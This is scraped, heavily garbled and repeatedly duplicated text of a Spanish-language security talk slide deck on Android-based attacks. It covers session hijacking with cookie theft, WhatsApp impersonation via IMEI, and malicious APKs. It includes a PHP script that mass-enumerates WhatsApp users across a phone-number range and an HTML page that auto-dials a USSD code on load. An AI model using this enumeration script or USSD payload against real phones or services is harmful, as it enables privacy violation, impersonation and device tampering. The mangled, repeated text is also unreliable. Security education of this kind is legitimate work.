no instales APK files de dudosa procedencia
![Page 4: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/4.jpg)
iquestPor queacute Android
68
17
5 4 4
2 0
Participacioacuten en el mercado de Sistemas Operativos moacuteviles
Android
IOS
Blackberry
Symbian
Windows
Linux
Otros
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 5: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/5.jpg)
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 6: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/6.jpg)
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 7: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/7.jpg)
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
